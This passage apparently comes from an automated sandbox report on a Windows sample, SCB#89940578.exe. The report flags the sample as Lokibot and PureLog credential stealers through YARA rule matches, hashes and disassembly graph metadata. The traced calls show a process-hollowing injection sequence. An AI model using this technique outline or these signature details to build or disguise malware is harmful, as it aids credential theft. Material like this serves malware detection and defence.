                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:04:42:00
                                            Start date:26/04/2024
                                            Path:C:\Users\user\Desktop\SCB#89940578.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SCB#89940578.exe"
                                            Imagebase:0x4e0000
                                            File size:706'056 bytes
                                            MD5 hash:8BDFE306F813BA1A65ECF6E1DA4085C1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                            • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:7.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:53
                                              Total number of Limit Nodes:2
                                              execution_graph 39602 298aed8 39603 298af1a 39602->39603 39604 298af20 GetModuleHandleW 39602->39604 39603->39604 39605 298af4d 39604->39605 39614 298d378 39615 298d3be 39614->39615 39618 298d558 39615->39618 39621 298b6d0 39618->39621 39622 298d5c0 DuplicateHandle 39621->39622 39623 298d4ab 39622->39623 39643 2984668 39644 2984672 39643->39644 39646 2984769 39643->39646 39647 298477d 39646->39647 39650 2984868 39647->39650 39652 298488f 39650->39652 39651 298496c 39652->39651 39654 29844e4 39652->39654 39655 29858f8 CreateActCtxA 39654->39655 39657 29859bb 39655->39657 39624 4f34050 39625 4f34054 39624->39625 39626 4f340ea CallWindowProcW 39625->39626 39627 4f34099 39625->39627 39626->39627 39606 737f9b0 39607 737f9fb ReadProcessMemory 39606->39607 39609 737fa3f 39607->39609 39658 737f800 39659 737f840 VirtualAllocEx 39658->39659 39661 737f87d 39659->39661 39662 737f8c0 39663 737f908 WriteProcessMemory 39662->39663 39665 737f95f 39663->39665 39628 298abf0 39631 298ace8 39628->39631 39629 298abff 39632 298acf9 39631->39632 39633 298ad14 39631->39633 39632->39633 39635 298af80 39632->39635 39633->39629 39636 298af94 39635->39636 39638 298afb9 39636->39638 39639 298a0a8 39636->39639 39638->39633 39640 298b160 LoadLibraryExW 39639->39640 39642 298b1d9 39640->39642 39642->39638 39610 737eeb8 39611 737eefd Wow64SetThreadContext 39610->39611 39613 737ef45 39611->39613 39666 737fb48 39667 737fbd1 CreateProcessA 39666->39667 39669 737fd93 39667->39669 39670 737ee08 39671 737ee48 ResumeThread 39670->39671 39673 737ee79 39671->39673

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 526 4f38d08-4f38f81 call 4f386fc call 4f3870c call 4f3871c call 4f3872c * 2 call 4f3873c call 4f3874c call 4f3875c * 6 586 4f39020-4f392c4 call 4f3875c * 2 call 4f3876c call 4f3877c * 4 call 4f3878c call 4f3879c call 4f387ac call 4f387bc call 4f387cc call 4f387dc call 4f387ec call 4f387fc 526->586 587 4f38f87-4f38faf 526->587 594 4f3aa56-4f3aa77 586->594 676 4f392ca-4f392d8 586->676 592 4f38fb7-4f38fba 587->592 593 4f38fc0-4f38fda 592->593 592->594 593->594 595 4f38fe0-4f38fea 593->595 600 4f3aa7e-4f3aa8f 594->600 601 4f3aa79 call 4f3876c 594->601 595->594 597 4f38ff0-4f39005 595->597 597->594 599 4f3900b-4f3901a 597->599 599->586 599->587 606 4f3aa91-4f3aaac call 4f38948 600->606 607 4f3aac8-4f3ab01 call 4f38958 call 4f38968 call 4f38978 600->607 601->600 606->607 618 4f3aaae-4f3aac0 606->618 625 4f3ab03-4f3ab0c call 4f38948 607->625 626 4f3ab11-4f3ab2f 607->626 618->607 625->626 995 4f3ab34 call 4f3e3c0 626->995 996 4f3ab34 call 4f3e446 626->996 997 4f3ab34 call 4f3e3af 626->997 633 4f3ab39-4f3ab3c 676->594 678 4f392de-4f39304 676->678 678->594 680 4f3930a-4f3931f 678->680 680->594 682 4f39325-4f39358 680->682 685 4f3935e-4f3aa55 call 4f3878c call 4f3880c call 4f3878c call 4f3880c call 4f3878c * 2 call 4f387ec call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3879c call 4f3880c call 4f3879c call 4f3880c * 3 call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3881c call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3882c call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3882c call 4f3883c call 4f3884c call 4f3885c call 4f3886c call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3887c call 4f387ac call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3888c call 4f3889c * 2 call 4f388ac call 4f3888c call 4f3889c * 4 call 4f3888c call 4f3889c * 2 call 4f387ac call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f388bc call 4f3889c call 4f388ac call 4f388bc call 4f3889c call 4f388bc call 4f3889c call 4f388ac call 4f388bc call 4f3889c call 4f388ac call 4f388cc call 4f388dc call 4f388f8 call 4f3880c * 2 call 4f38908 call 4f38918 call 4f38928 call 4f387cc call 4f354e4 call 4f3878c call 4f3879c * 2 call 4f38938 * 5 682->685 995->633 996->633 997->633
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1707555025.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4f30000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ($($($($($($,$,$,$,$,$,$,$,$-$-$-$.$.$.$.$.$/$/$1$7$7$K$[$\-$i
                                              • API String ID: 0-851490389
                                              • Opcode ID: af988cbc7677a3043c9d98898ff69ae1eb370756017c63e7f04bd57f5a8ff3a3
                                              • Instruction ID: ca2c011eced80dab83d63e263ce5ba0c80b63f2f7ebc627dded15ed9312f308b
                                              • Opcode Fuzzy Hash: af988cbc7677a3043c9d98898ff69ae1eb370756017c63e7f04bd57f5a8ff3a3
                                              • Instruction Fuzzy Hash: 7C134930A00214CFDB15EF34C894A99B7B2FF89305F5486A9E809AF365DB75AD85CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 998 4f38cf9-4f38d5f 1002 4f38d69-4f38d6d call 4f386fc 998->1002 1004 4f38d72-4f38d7d 1002->1004 1006 4f38d87-4f38d8b call 4f3870c 1004->1006 1008 4f38d90-4f38df5 call 4f3871c call 4f3872c * 2 1006->1008 1022 4f38dff-4f38e03 call 4f3873c 1008->1022 1024 4f38e08-4f38e31 call 4f3874c 1022->1024 1030 4f38e3b-4f38e3f call 4f3875c 1024->1030 1032 4f38e44-4f38f81 call 4f3875c * 5 1030->1032 1058 4f39020-4f3929f call 4f3875c * 2 call 4f3876c call 4f3877c * 4 call 4f3878c call 4f3879c call 4f387ac call 4f387bc call 4f387cc call 4f387dc call 4f387ec call 4f387fc 1032->1058 1059 4f38f87-4f38faf 1032->1059 1145 4f392a9-4f392ba 1058->1145 1064 4f38fb7-4f38fba 1059->1064 1065 4f38fc0-4f38fda 1064->1065 1066 4f3aa56 1064->1066 1065->1066 1067 4f38fe0-4f38fea 1065->1067 1070 4f3aa5b-4f3aa77 1066->1070 1067->1066 1069 4f38ff0-4f39005 1067->1069 1069->1066 1071 4f3900b-4f3901a 1069->1071 1072 4f3aa7e-4f3aa8f 1070->1072 1073 4f3aa79 call 4f3876c 1070->1073 1071->1058 1071->1059 1078 4f3aa91-4f3aaac call 4f38948 1072->1078 1079 4f3aac8-4f3aacf call 4f38958 1072->1079 1073->1072 1078->1079 1090 4f3aaae-4f3aac0 1078->1090 1084 4f3aad4-4f3ab01 call 4f38968 call 4f38978 1079->1084 1097 4f3ab03-4f3ab0c call 4f38948 1084->1097 1098 4f3ab11-4f3ab1c 1084->1098 1090->1079 1097->1098 1103 4f3ab26-4f3ab2f 1098->1103 1467 4f3ab34 call 4f3e3c0 1103->1467 1468 4f3ab34 call 4f3e446 1103->1468 1469 4f3ab34 call 4f3e3af 1103->1469 1105 4f3ab39-4f3ab3c 1147 4f392c0-4f392c4 1145->1147 1147->1066 1148 4f392ca-4f392d8 1147->1148 1148->1066 1150 4f392de-4f39304 1148->1150 1150->1066 1152 4f3930a-4f3931f 1150->1152 1152->1066 1154 4f39325-4f3933c 1152->1154 1156 4f39346-4f39358 1154->1156 1157 4f3935e-4f3aa55 call 4f3878c call 4f3880c call 4f3878c call 4f3880c call 4f3878c * 2 call 4f387ec call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3879c call 4f3880c call 4f3879c call 4f3880c * 3 call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3881c call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3882c call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3882c call 4f3883c call 4f3884c call 4f3885c call 4f3886c call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3887c call 4f387ac call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f3888c call 4f3889c * 2 call 4f388ac call 4f3888c call 4f3889c * 4 call 4f3888c call 4f3889c * 2 call 4f387ac call 4f387bc call 4f387cc call 4f387ec call 4f387fc call 4f388bc call 4f3889c call 4f388ac call 4f388bc call 4f3889c call 4f388bc call 4f3889c call 4f388ac call 4f388bc call 4f3889c call 4f388ac call 4f388cc call 4f388dc call 4f388f8 call 4f3880c * 2 call 4f38908 call 4f38918 call 4f38928 call 4f387cc call 4f354e4 call 4f3878c call 4f3879c * 2 call 4f38938 * 5 1156->1157 1467->1105 1468->1105 1469->1105
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1707555025.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4f30000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ($($($($($($,$,$,$,$,$,$,$,$-$-$-$.$.$.$.$.$/$/$1$7$7$K$[$\-$i
                                              • API String ID: 0-851490389
                                              • Opcode ID: 6f1d5c39dd98b5a4c5a4c9d6015cbbabde9805fbfe8ba2ec04a5f6fe54e61f1c
                                              • Instruction ID: 2ea6df727eac1bbd7edaddfc85d60630a65cc73e1022e91c72fcbff47482ba59
                                              • Opcode Fuzzy Hash: 6f1d5c39dd98b5a4c5a4c9d6015cbbabde9805fbfe8ba2ec04a5f6fe54e61f1c
                                              • Instruction Fuzzy Hash: D0033830A00215CFDB15EF34C894A98B7B2FF89305F5486A9E809AF365DB75AD85CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 832293960a58ee2f6f856dcbf8210ec4d247ae18932e9e2d98475b1b5901eb74
                                              • Instruction ID: f67635fd3f07d051b06537c53e6f59e78b5062757d2498bb4be0f7edf411fc65
                                              • Opcode Fuzzy Hash: 832293960a58ee2f6f856dcbf8210ec4d247ae18932e9e2d98475b1b5901eb74
                                              • Instruction Fuzzy Hash: BC9147B0D15219DFDB18CFA5E58199EFBB6FF8A310F20A41AE41ABB224D7349941CF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8c21d836aa080b00b07c456c4383b38f8c4de08b77ba4be8b655422990fed15
                                              • Instruction ID: 7e976bcf79af2952436c40f9d9ee695980b7017390d8e18eb8e35cc1b319b023
                                              • Opcode Fuzzy Hash: e8c21d836aa080b00b07c456c4383b38f8c4de08b77ba4be8b655422990fed15
                                              • Instruction Fuzzy Hash: 289146B0E11219DFDB18CFA5E58199EFBB6FF89310F20A41AE41AB7264D7389941CF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be991410c540da136336d85f88b1857a7559b19a4d782bcbb28a6d8d7279491a
                                              • Instruction ID: 557884c6661c653c5a629271c80e31b7428e2932280726fc1e1478bf6f3de28b
                                              • Opcode Fuzzy Hash: be991410c540da136336d85f88b1857a7559b19a4d782bcbb28a6d8d7279491a
                                              • Instruction Fuzzy Hash: 808112B4E14219CFDB14CFA9D9809AEFBF2FF89300F10A56AE415A7254D7389942CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a658034c7a1ac72b8cf65c642889f58c9f53840e33602ec3de09c6bdeb8b663f
                                              • Instruction ID: dbd0905e0f1b8e29e9f6b1f5eb23f2e2940ea70d2e819d8f7bc8db919fcb0019
                                              • Opcode Fuzzy Hash: a658034c7a1ac72b8cf65c642889f58c9f53840e33602ec3de09c6bdeb8b663f
                                              • Instruction Fuzzy Hash: CA8120B4E10219CFDB14CFA9C9809AEFBF6FB89300F10A52AE505B7254D7389942CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1499 737fb3d-737fbdd 1502 737fc16-737fc36 1499->1502 1503 737fbdf-737fbe9 1499->1503 1510 737fc6f-737fc9e 1502->1510 1511 737fc38-737fc42 1502->1511 1503->1502 1504 737fbeb-737fbed 1503->1504 1505 737fc10-737fc13 1504->1505 1506 737fbef-737fbf9 1504->1506 1505->1502 1508 737fbfd-737fc0c 1506->1508 1509 737fbfb 1506->1509 1508->1508 1512 737fc0e 1508->1512 1509->1508 1517 737fcd7-737fd91 CreateProcessA 1510->1517 1518 737fca0-737fcaa 1510->1518 1511->1510 1513 737fc44-737fc46 1511->1513 1512->1505 1515 737fc69-737fc6c 1513->1515 1516 737fc48-737fc52 1513->1516 1515->1510 1519 737fc56-737fc65 1516->1519 1520 737fc54 1516->1520 1531 737fd93-737fd99 1517->1531 1532 737fd9a-737fe20 1517->1532 1518->1517 1522 737fcac-737fcae 1518->1522 1519->1519 1521 737fc67 1519->1521 1520->1519 1521->1515 1523 737fcd1-737fcd4 1522->1523 1524 737fcb0-737fcba 1522->1524 1523->1517 1526 737fcbe-737fccd 1524->1526 1527 737fcbc 1524->1527 1526->1526 1529 737fccf 1526->1529 1527->1526 1529->1523 1531->1532 1542 737fe22-737fe26 1532->1542 1543 737fe30-737fe34 1532->1543 1542->1543 1544 737fe28 1542->1544 1545 737fe36-737fe3a 1543->1545 1546 737fe44-737fe48 1543->1546 1544->1543 1545->1546 1547 737fe3c 1545->1547 1548 737fe4a-737fe4e 1546->1548 1549 737fe58-737fe5c 1546->1549 1547->1546 1548->1549 1552 737fe50 1548->1552 1550 737fe6e-737fe75 1549->1550 1551 737fe5e-737fe64 1549->1551 1553 737fe77-737fe86 1550->1553 1554 737fe8c 1550->1554 1551->1550 1552->1549 1553->1554 1556 737fe8d 1554->1556 1556->1556
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0737FD7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: c76415d916bd3dd8108fcd7fd72296d56e818976374daba1754442d0bbe20781
                                              • Instruction ID: 704d98ebc1755e9361cc47fb98aacc950c0eee4ae084882838588f36f0c10445
                                              • Opcode Fuzzy Hash: c76415d916bd3dd8108fcd7fd72296d56e818976374daba1754442d0bbe20781
                                              • Instruction Fuzzy Hash: 67A171B1D0021ADFEF20DF68C8417EDBBB2BF48314F148569D858A7244DB789986CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1557 737fb48-737fbdd 1559 737fc16-737fc36 1557->1559 1560 737fbdf-737fbe9 1557->1560 1567 737fc6f-737fc9e 1559->1567 1568 737fc38-737fc42 1559->1568 1560->1559 1561 737fbeb-737fbed 1560->1561 1562 737fc10-737fc13 1561->1562 1563 737fbef-737fbf9 1561->1563 1562->1559 1565 737fbfd-737fc0c 1563->1565 1566 737fbfb 1563->1566 1565->1565 1569 737fc0e 1565->1569 1566->1565 1574 737fcd7-737fd91 CreateProcessA 1567->1574 1575 737fca0-737fcaa 1567->1575 1568->1567 1570 737fc44-737fc46 1568->1570 1569->1562 1572 737fc69-737fc6c 1570->1572 1573 737fc48-737fc52 1570->1573 1572->1567 1576 737fc56-737fc65 1573->1576 1577 737fc54 1573->1577 1588 737fd93-737fd99 1574->1588 1589 737fd9a-737fe20 1574->1589 1575->1574 1579 737fcac-737fcae 1575->1579 1576->1576 1578 737fc67 1576->1578 1577->1576 1578->1572 1580 737fcd1-737fcd4 1579->1580 1581 737fcb0-737fcba 1579->1581 1580->1574 1583 737fcbe-737fccd 1581->1583 1584 737fcbc 1581->1584 1583->1583 1586 737fccf 1583->1586 1584->1583 1586->1580 1588->1589 1599 737fe22-737fe26 1589->1599 1600 737fe30-737fe34 1589->1600 1599->1600 1601 737fe28 1599->1601 1602 737fe36-737fe3a 1600->1602 1603 737fe44-737fe48 1600->1603 1601->1600 1602->1603 1604 737fe3c 1602->1604 1605 737fe4a-737fe4e 1603->1605 1606 737fe58-737fe5c 1603->1606 1604->1603 1605->1606 1609 737fe50 1605->1609 1607 737fe6e-737fe75 1606->1607 1608 737fe5e-737fe64 1606->1608 1610 737fe77-737fe86 1607->1610 1611 737fe8c 1607->1611 1608->1607 1609->1606 1610->1611 1613 737fe8d 1611->1613 1613->1613
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0737FD7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: fbbb1a1ab45a318eff7bef15d692826046e776fd133ef66d6ece529bafff9ca6
                                              • Instruction ID: 30b7f1e915d69ded0619b633a9ea69b22d6cda1bf5d085b682c0f92a77dcde5c
                                              • Opcode Fuzzy Hash: fbbb1a1ab45a318eff7bef15d692826046e776fd133ef66d6ece529bafff9ca6
                                              • Instruction Fuzzy Hash: 6F9172B1D0021ADFEF20DF68C8417EDBBB2BF48314F148569D858A7244DB749986CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1723 29844e4-29859b9 CreateActCtxA 1726 29859bb-29859c1 1723->1726 1727 29859c2-2985a1c 1723->1727 1726->1727 1734 2985a2b-2985a2f 1727->1734 1735 2985a1e-2985a21 1727->1735 1736 2985a40 1734->1736 1737 2985a31-2985a3d 1734->1737 1735->1734 1739 2985a41 1736->1739 1737->1736 1739->1739
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 029859A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 18c008e512e343fff9b28ecb30f8d3213aae05eee2abc05a499fc2e952cfe628
                                              • Instruction ID: 193947aae30087b0a22d5c873c117cbef09dee1687bd3f40218ee681e356f775
                                              • Opcode Fuzzy Hash: 18c008e512e343fff9b28ecb30f8d3213aae05eee2abc05a499fc2e952cfe628
                                              • Instruction Fuzzy Hash: 93410FB0C00719CBDB24DFA9C884BCEBBB5BF48304F25806AD448BB251DB756949CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1740 4f34050-4f3408c 1742 4f34092-4f34097 1740->1742 1743 4f3413c-4f3415c 1740->1743 1744 4f340ea-4f34122 CallWindowProcW 1742->1744 1745 4f34099-4f340d0 1742->1745 1749 4f3415f-4f3416c 1743->1749 1747 4f34124-4f3412a 1744->1747 1748 4f3412b-4f3413a 1744->1748 1751 4f340d2-4f340d8 1745->1751 1752 4f340d9-4f340e8 1745->1752 1747->1748 1748->1749 1751->1752 1752->1749
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F34111
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1707555025.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4f30000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              • Opcode ID: 79e140f7f5f26b602a136a36315af9236a74360f5d49ad99b3bf6297b4b43fbb
                                              • Instruction ID: fa6cac4505d06340be045aad4b36dc7f83e0fba8807d84e1ed8a1c253e392575
                                              • Opcode Fuzzy Hash: 79e140f7f5f26b602a136a36315af9236a74360f5d49ad99b3bf6297b4b43fbb
                                              • Instruction Fuzzy Hash: 7E4125B5A00219DFDB14DF89C888AABBBF5FB88315F24C459D459AB321D374A841CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1755 737f8b8-737f90e 1758 737f910-737f91c 1755->1758 1759 737f91e-737f95d WriteProcessMemory 1755->1759 1758->1759 1761 737f966-737f996 1759->1761 1762 737f95f-737f965 1759->1762 1762->1761
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0737F950
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 99788917bad858d335460cfd03e3cddf6c72ec89c4167ce3c7c5c1823b3899da
                                              • Instruction ID: 918946f6a665153e1c8a1ad66802c3c9afbc3bae8fad8d1216b886b5559554c1
                                              • Opcode Fuzzy Hash: 99788917bad858d335460cfd03e3cddf6c72ec89c4167ce3c7c5c1823b3899da
                                              • Instruction Fuzzy Hash: 6F2137B19002599FDB10DFA9C885BDEBBF4FB48320F108429E958A7240C778A544CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1766 737f8c0-737f90e 1768 737f910-737f91c 1766->1768 1769 737f91e-737f95d WriteProcessMemory 1766->1769 1768->1769 1771 737f966-737f996 1769->1771 1772 737f95f-737f965 1769->1772 1772->1771
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0737F950
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
